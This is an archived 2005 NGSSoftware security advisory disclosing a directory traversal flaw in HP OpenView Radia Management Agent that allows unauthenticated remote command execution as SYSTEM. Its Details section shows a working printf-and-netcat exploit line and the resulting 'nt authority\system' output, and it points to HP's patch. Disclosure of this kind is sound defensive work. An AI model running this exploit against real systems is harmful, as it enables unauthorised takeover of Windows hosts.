NGSSoftware Insight Security Research Advisory Name: HP OpenView Radia Management Agent remote command execution via directory traversal Systems Affected: HP OpenView Radia Management Portal versions 2.x and 1.x running Radia Management Agent Severity: High Vendor URL: http://www.hp.com/ Authors: David Morgan davidm@private Dominic Beecher dominic@private Date of initial advisory: 28 April 2005 Date of full advisory: 28 July 2005 Description ----------- The Radia Management Agent is part of HP's OpenView Radia suite of software. It runs as a Windows service (RMA) with Local System privileges. The RMA service listens on a TCP port that is not fixed. In the example below, the service was listening on TCP port 1065. By connecting to the TCP port and sending a crafted packet, it is possible to traverse out of C:\Program Files\Novadigm (the apparent working directory) and run any executable that is located on the same logical disk partition, in this case the C: drive. Details ------- C:\>sc queryex rma SERVICE_NAME: rma TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 1032 FLAGS : C:\>netstat -ano Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:1065 0.0.0.0:0 LISTENING 1032 bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v xx.xx.xx.xx 1065 host.domain [xx.xx.xx.xx] 1065 (?) open nt authority\system The output from whoami.exe clearly demonstrates that it is possible for a remote attacker to execute arbitrary system commands with Local System privileges without authentication. Fix Information --------------- HP has developed a patch to fix the problem. More information can be found in their security bulletin HPSBMA01138: http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138 About NGSSoftware ----------------- NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting, offers best of breed security consulting services, specialising in application, host and network security assessments. http://www.ngssoftware.com/ Tel: +44 (0)20 8401 0070 Fax: +44 (0)20 8401 0076 enquiries@private
This archive was generated by hypermail 2.1.3 : Thu Jul 28 2005 - 05:48:30 PDT